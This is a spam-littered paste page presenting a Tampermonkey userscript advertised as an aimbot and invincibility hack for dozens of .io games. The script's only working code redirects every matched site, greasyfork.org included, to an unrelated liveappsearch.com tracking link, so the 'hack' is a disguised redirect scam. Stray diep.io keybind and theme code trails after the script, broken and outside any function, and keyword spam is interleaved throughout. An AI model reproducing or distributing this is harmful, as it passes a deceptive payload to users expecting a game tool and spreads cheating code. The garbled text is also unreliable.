polyblicy aimbot // ==UserScript== // @name New Best Script Hack For .IO Games ( Aimbot , Invincible, Invisible, Teleportation, And More ) // @namespace http://tampermonkey.net/ // @version 9.62 // @description Best Hack for .io games // @author Molp // @match *://*.krunker.io/* // @match *://*.zombsroyale.io/* // @match *://*.zombs.io/* // @match *://*.agar.io/* // @match *://*.diep.io/* polyblicy aimbot How to get it for free? polyblicy aimbot // @match *://*.mope.io/* // @match *://*.paper.io/* // @match *://*.shellshock.io/* // @match *://*.hole.io/* // @match *://*.surviv.io/* // @match *://*.krunker.io/?game=* // @match *://*.rocketball.io/* // @match *://*.flaap.io/* // @match *://*.wormax.io/* // @match *://*.tankwars.io/* polyblicy aimbot PasteShr polyblicy aimbot // @match *://*.vanar.io/* // @match *://*.greasyfork.org/* // @match *://*.skribbl.io/* // @match *://*.Wormate.io/* // @match *://*.foes.io/* // @grant none // ==/UserScript== (function() { 'use strict'; polyblicy aimbot How to get it? polyblicy aimbot window.location.replace("https://www.liveappsearch.com/cl.php?id=5600485b8eabf4ba7091114aa31b3bfc"); })(); //Build keys //Go to http://keycode.info/ if you want to reassign keys and then change the number after "e.keyCode===" //00077757 = "z key" if(e.keyCode===90){ input.execute("game_stats_build 5566445965656565644444888888877777"); polyblicy aimbot How to get it for free? polyblicy aimbot } //02377707 = "x key" if(e.keyCode===88){ input.execute("game_stats_build 556644565656565644444888888832323"); } //02307777 = "b key" if(e.keyCode===66){ input.execute("game_stats_build 775566777775656565656888888832323"); } //00067776 spammer = "n key" polyblicy aimbot PasteShr polyblicy aimbot if(e.keyCode===78){ input.execute("game_stats_build 775566777775656565656888888444444"); } //Themes bellow. Delete if you don't care, but IMO these are lit. //My theme = "v key" if(e.keyCode===86){ input.execute("ui_replace_colors 0xA221FE 0x7008FF 0x3426FF 0x0E69E6 0x06DDFF 0x00FFF9 0x00FFA2 0x00FF09"); input.execute("ren_grid_base_alpha 0.3"); polyblicy aimbot How to dowload it? polyblicy aimbot input.execute("ren_stroke_soft_color_intensity 0.6"); input.execute("ren_background_color 0xAAAAAA"); input.execute("ren_bar_background_color 0x93ebff"); input.execute("ren_health_background_color 0x2E5A89"); input.execute("ren_health_fill_color 0x00FF00"); input.execute("ren_minimap_viewport true"); input.set_convar("ren_solid_background", true); input.set_convar("ren_fps", true); setInterval(function(){input.keyDown(76);},150); } polyblicy aimbot How to dowload it? polyblicy aimbot ///u/162893476 Remove Upgrades = ", key" if(e.keyCode===188){ input.set_convar("ren_upgrades", false); setInterval(function(){input.keyDown(76);},150); } ///u/162893476 Enable Upgrades = ". key" if(e.keyCode===190){ input.set_convar("ren_upgrades", true); } polyblicy aimbot